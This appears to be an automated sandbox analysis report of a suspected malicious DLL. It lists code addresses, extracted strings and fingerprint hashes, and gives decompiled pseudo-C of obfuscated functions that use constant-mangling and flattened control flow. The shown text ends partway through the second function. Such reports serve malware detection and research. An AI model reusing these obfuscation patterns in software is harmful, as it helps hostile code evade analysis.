0x02b46bed
0x02b46bf3
0x02b46bfb
0x02b46c03
0x02b46c0b
0x02b46c13
0x02b46c1b
0x02b46c2a
0x02b46c2d
0x02b46c31
0x02b46c39
0x02b46c41
0x02b46c49
0x02b46c4e
0x02b46c56
0x02b46c5e
0x02b46c6b
0x02b46c6f
0x02b46c77
0x02b46c7f
0x02b46c8b
0x02b46c90
0x02b46c96
0x02b46c9e
0x02b46ca6
0x02b46cae
0x02b46cb6
0x02b46cbe
0x02b46cc9
0x02b46cd1
0x02b46cdc
0x02b46ce7
0x02b46cef
0x02b46cf7
0x02b46d03
0x02b46d08
0x02b46d0e
0x02b46d16
0x02b46d21
0x02b46d30
0x02b46d35
0x02b46d3e
0x02b46d49
0x02b46d5c
0x02b46d5d
0x02b46d64
0x02b46d6f
0x02b46d82
0x02b46d89
0x02b46d94
0x02b46d9f
0x02b46daa
0x02b46db5
0x02b46dc0
0x02b46dce
0x02b46dd2
0x02b46dda
0x02b46de2
0x02b46dea
0x02b46df7
0x02b46e02
0x02b46e0a
0x02b46e15
0x02b46e29
0x02b46e2e
0x02b46e37
0x02b46e42
0x02b46e4d
0x02b46e60
0x02b46e63
0x02b46e66
0x02b46e6d
0x02b46e78
0x02b46e80
0x02b46e88
0x02b46e90
0x02b46e98
0x02b46ea0
0x02b46eab
0x02b46eb3
0x02b46ebe
0x02b46ec9
0x02b46ed6
0x02b46eda
0x02b46ee2
0x02b46eea
0x02b46ef2
0x02b46efd
0x02b46f08
0x02b46f13
0x02b46f1e
0x02b46f29
0x02b46f34
0x02b46f3f
0x02b46f47
0x02b46f52
0x02b46f5d
0x02b46f68
0x02b46f70
0x02b46f7b
0x02b46f83
0x02b46f8d
0x02b46f99
0x02b46f9d
0x02b46fa5
0x02b46fb0
0x02b46fb8
0x02b46fc3
0x02b46fce
0x02b46fe1
0x02b46fe8
0x02b46ff3
0x02b47005
0x02b4700a
0x02b4701a
0x02b4701d
0x02b47024
0x02b47031
0x02b47039
0x02b47041
0x02b4704f
0x02b47054
0x02b47058
0x02b47060
0x02b4706b
0x02b47076
0x02b47081
0x02b4708c
0x02b47097
0x02b470a2
0x02b470b1
0x02b470b2
0x02b470b6
0x02b470c3
0x02b470c7
0x02b470cf
0x02b470d7
0x02b470db
0x02b470e0
0x02b470e8
0x02b470f0
0x02b470fb
0x02b47103
0x02b4710e
0x02b47119
0x02b47124
0x02b4712f
0x02b4713a
0x02b47145
0x02b47150
0x02b4715b
0x02b47166
0x02b47171
0x02b47179
0x02b47186
0x02b4718a
0x02b4718f
0x02b47197
0x02b4719f
0x02b471a7
0x02b471af
0x02b471b7
0x02b471bf
0x02b471ca
0x02b471d5
0x02b471e0
0x02b471eb
0x02b471f3
0x02b471fe
0x02b47209
0x02b4721c
0x02b47223
0x02b4722e
0x02b4723c
0x02b47240
0x02b47245
0x02b4724d
0x02b47255
0x02b4725d
0x02b47262
0x02b4726f
0x02b47273
0x02b4727b
0x02b47285
0x02b47291
0x02b47292
0x02b47296
0x02b4729e
0x02b472a6
0x02b472b1
0x02b472bc
0x02b472c7
0x02b472d2
0x02b472da
0x02b472e5
0x02b472f0
0x02b472f8
0x02b47300
0x02b47308
0x02b4730d
0x02b47315
0x02b47329
0x02b47330
0x02b4733b
0x02b47346
0x02b4734e
0x02b4735b
0x02b4735f
0x02b47367
0x02b4736f
0x02b4737a
0x02b47382
0x02b4738a
0x02b47395
0x02b473a0
0x02b473ab
0x02b473b6
0x02b473be
0x02b473c6
0x02b473ce
0x02b473d6
0x02b473de
0x02b473f1
0x02b473f8
0x02b47400
0x02b4740b
0x02b4741e
0x02b47425
0x02b4742d
0x02b47438
0x02b47443
0x02b4744e
0x02b47456
0x02b47461
0x02b47469
0x02b47476
0x02b4747a
0x02b47482
0x02b4748a
0x02b47495
0x02b474a0
0x02b474ab
0x02b474b3
0x02b474b8
0x02b474bd
0x02b474c5
0x02b474cd
0x02b474d2
0x02b474da
0x02b474e5
0x02b474f0
0x02b474f8
0x02b47503
0x02b4750a
0x02b47511
0x02b47511
0x02b47511
0x02b47516
0x02b47516
0x02b4751a
0x02b4751a
0x02b4751a
0x02b47520
0x00000000
0x00000000
0x02b47526
0x02b476ab
0x00000000
0x02b4752c
0x02b47532
0x02b47699
0x02b4769b
0x02b476a2
0x02b476a3
0x00000000
0x02b47538
0x02b4753e
0x02b47651
0x02b4765d
0x02b47672
0x02b47679
0x02b4767e
0x02b47683
0x02b47915
0x02b47915
0x02b4791c
0x00000000
0x02b47544
0x02b4754a
0x02b4761e
0x02b47623
0x00000000
0x02b47550
0x02b47556
0x02b475f0
0x02b475f5
0x02b475fa
0x02b475fc
0x02b475fc
0x00000000
0x02b4755c
0x02b47563
0x02b47921
0x02b47921
0x02b47927
0x02b47516
0x00000000
0x02b47516
0x02b47569
0x02b475b6
0x02b475bb
0x02b475c2
0x02b475c7
0x02b475d0
0x02b475d5
0x00000000
0x02b475d5
0x02b47563
0x02b47556
0x02b4754a
0x02b4753e
0x02b47532
0x02b47945
0x02b47951
0x02b47951
0x02b476b5
0x02b476b7
0x02b47772
0x02b47775
0x02b477a6
0x02b47777
0x02b47777
0x02b47783
0x02b4778a
0x02b47795
0x02b4779a
0x02b4779d
0x02b4779d
0x02b477e6
0x02b477ed
0x02b477ed
0x02b477ef
0x02b477f1
0x02b477f1
0x02b47841
0x02b47858
0x02b4785d
0x02b47860
0x02b47862
0x02b47910
0x00000000
0x02b47868
0x02b4788b
0x02b47892
0x02b47897
0x02b4789a
0x02b4789c
0x02b478c6
0x02b478d6
0x02b478d6
0x02b478d6
0x02b478fe
0x02b47903
0x02b47903
0x02b47906
0x00000000
0x02b47906
0x02b476bd
0x02b476bd
0x02b476c3
0x02b47763
0x02b4776a
0x00000000
0x02b476c9
0x02b476c9
0x02b476cf
0x02b4793e
0x02b476d5
0x02b476d5
0x02b476db
0x02b476f3
0x02b476f5
0x02b476f7
0x02b47705
0x02b47705
0x02b476f9
0x02b47700
0x02b47700
0x02b47707
0x02b4772c
0x02b47731
0x02b47736
0x02b4773e
0x00000000
0x02b476dd
0x02b476dd
0x02b476e3
0x00000000
0x02b476e9
0x02b476e9
0x00000000
0x02b476e9
0x02b476e3
0x02b476db
0x02b476cf
0x02b476c3
0x00000000
0x02b476b7
0x02b47516

Strings

n3u, xrefs: 02B4692C
LG, xrefs: 02B46892
)fVX, xrefs: 02B468B3
OHR, xrefs: 02B47171
=o, xrefs: 02B46F70
c', xrefs: 02B46EF2
2 ], xrefs: 02B472F0
H#, xrefs: 02B473B6
&B, xrefs: 02B46E80
^, xrefs: 02B4706B
OI, xrefs: 02B47058
!, xrefs: 02B4747A
R<, xrefs: 02B46DC0

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: 43523031d790131cd43d70d32bcaee720125a2a0465e94dfd7296321e74255ae
Instruction ID: b1237b27a61d041510b42d2f2d447b01f0b4612ac00d2ca9d81af942ec84fc79
Opcode Fuzzy Hash: 43523031d790131cd43d70d32bcaee720125a2a0465e94dfd7296321e74255ae
Instruction Fuzzy Hash: E492FDB1509381CFD3B9CF25C58AA8BBBE2FBC4308F10891DE5D996260D7B58949DF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B4A474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02B4A474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E02B31A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E02B52D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x2b3192c,  &_v520,  &_v1040, E02B4E1F8(0x2b3192c, _v2696, __eflags));
						E02B4FECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E02B485FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E02B50DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E02B409DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					E02B3BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E02B52D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x2b3188c,  &_v2080,  &_v2600, E02B4E1F8(0x2b3188c, _v2780, _t500));
					E02B4FECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E02B3BFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x02b4a474
0x02b4a47e
0x02b4a480
0x02b4a48a
0x02b4a492
0x02b4a497
0x02b4a49f
0x02b4a4a7
0x02b4a4af
0x02b4a4b4
0x02b4a4bc
0x02b4a4c4
0x02b4a4cf
0x02b4a4d7
0x02b4a4e2
0x02b4a4ea
0x02b4a4ef
0x02b4a4f7
0x02b4a4ff
0x02b4a507
0x02b4a50b
0x02b4a513
0x02b4a51b
0x02b4a526
0x02b4a52e
0x02b4a539
0x02b4a541
0x02b4a546
0x02b4a54a
0x02b4a552
0x02b4a55d
0x02b4a568
0x02b4a573
0x02b4a586
0x02b4a58d
0x02b4a598
0x02b4a59d
0x02b4a5a5
0x02b4a5aa
0x02b4a5b9
0x02b4a5bc
0x02b4a5c0
0x02b4a5c8
0x02b4a5d3
0x02b4a5de
0x02b4a5e9
0x02b4a5f1
0x02b4a5f9
0x02b4a5fe
0x02b4a603
0x02b4a60b
0x02b4a616
0x02b4a621
0x02b4a62c
0x02b4a634
0x02b4a639
0x02b4a641
0x02b4a649
0x02b4a65f
0x02b4a666
0x02b4a671
0x02b4a67d
0x02b4a680
0x02b4a684
0x02b4a68c
0x02b4a694
0x02b4a6a7
0x02b4a6ae
0x02b4a6bb
0x02b4a6c6
0x02b4a6d1
0x02b4a6dc
0x02b4a6e7
0x02b4a6ef
0x02b4a6fa
0x02b4a705
0x02b4a710
0x02b4a71b
0x02b4a726
0x02b4a731
0x02b4a73c
0x02b4a74b
0x02b4a74e
0x02b4a757
0x02b4a75b
0x02b4a763
0x02b4a770
0x02b4a774
0x02b4a77c
0x02b4a784
0x02b4a78f
0x02b4a79a
0x02b4a7a5
0x02b4a7ad
0x02b4a7b5
0x02b4a7ba
0x02b4a7c2
0x02b4a7ca
0x02b4a7d2
0x02b4a7da
0x02b4a7e2
0x02b4a7f8
0x02b4a7ff
0x02b4a80a
0x02b4a815
0x02b4a81d
0x02b4a828
0x02b4a834
0x02b4a839
0x02b4a843
0x02b4a846
0x02b4a84a
0x02b4a852
0x02b4a85a
0x02b4a862
0x02b4a867
0x02b4a86f
0x02b4a877
0x02b4a87f
0x02b4a887
0x02b4a88c
0x02b4a894
0x02b4a89c
0x02b4a8a1
0x02b4a8a9
0x02b4a8b1
0x02b4a8b9
0x02b4a8be
0x02b4a8c3
0x02b4a8cb
0x02b4a8d8
0x02b4a8e1
0x02b4a8e7
0x02b4a8f4
0x02b4a901
0x02b4a909
0x02b4a90e
0x02b4a913
0x02b4a91b
0x02b4a923
0x02b4a92b
0x02b4a933
0x02b4a937
0x02b4a93f
0x02b4a94a
0x02b4a952
0x02b4a95d
0x02b4a965
0x02b4a96d
0x02b4a975
0x02b4a97d
0x02b4a985
0x02b4a98d
0x02b4a99c
0x02b4a99d
0x02b4a9a1
0x02b4a9a6
0x02b4a9ae
0x02b4a9bb
0x02b4a9bf
0x02b4a9c7
0x02b4a9cf
0x02b4a9d7
0x02b4a9e2
0x02b4a9ed
0x02b4a9f8
0x02b4aa00
0x02b4aa05
0x02b4aa0d
0x02b4aa12
0x02b4aa1a
0x02b4aa25
0x02b4aa2d
0x02b4aa38
0x02b4aa43
0x02b4aa4b
0x02b4aa56
0x02b4aa61
0x02b4aa69
0x02b4aa74
0x02b4aa7f
0x02b4aa8a
0x02b4aa95
0x02b4aa9d
0x02b4aaa9
0x02b4aaab
0x02b4aaaf
0x02b4aab7
0x02b4aabf
0x02b4aac7
0x02b4aacf
0x02b4aad7
0x02b4aadf
0x02b4aaed
0x02b4ac4c
0x02b4ac51
0x02b4ac5d
0x02b4ac61
0x02b4acaa
0x02b4acca
0x02b4acd9
0x00000000
0x02b4acfa
0x02b4aaf3
0x02b4aaf5
0x02b4ac13
0x02b4ac13
0x02b4ac19
0x00000000
0x00000000
0x00000000
0x00000000
0x02b4ad07
0x02b4ad07
0x02b4ad07
0x02b4ab12
0x02b4ab37
0x02b4ab5b
0x02b4ab60
0x02b4ab6c
0x02b4ab70
0x02b4abc2
0x02b4abe2
0x02b4abee
0x02b4abfa
0x02b4abff
0x02b4ac04
0x02b4ac0a
0x00000000
0x02b4ac0a
0x00000000
0x02b4ac04
0x02b4ac11
0x00000000

Strings

.5, xrefs: 02B4A877
spC, xrefs: 02B4A4E2
L, xrefs: 02B4A9ED
p(}, xrefs: 02B4A731
.7Y, xrefs: 02B4A684
3k, xrefs: 02B4A7D2
Q/O, xrefs: 02B4A9F8
h, xrefs: 02B4A852
+f%, xrefs: 02B4A86F
$P, xrefs: 02B4A47C
%Z, xrefs: 02B4A694
n,, xrefs: 02B4A4FF

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: d7a4b554e05b57646813a43df3e4ff1dc8f97ebad581f1eae2ccdb69e845c973
Instruction ID: 4788e746dbf4411f4a1576579e00eaeb03303a169d3bc18682019b9e1e646ead
Opcode Fuzzy Hash: d7a4b554e05b57646813a43df3e4ff1dc8f97ebad581f1eae2ccdb69e845c973
Instruction Fuzzy Hash: CF12E1714093809FD3A9CF60C989A8BFBE1FBC4348F108A1DE1DA96260DBB58549CF57

Uniqueness

Uniqueness Score: -1.00%

Function 02B4D1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E02B4D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
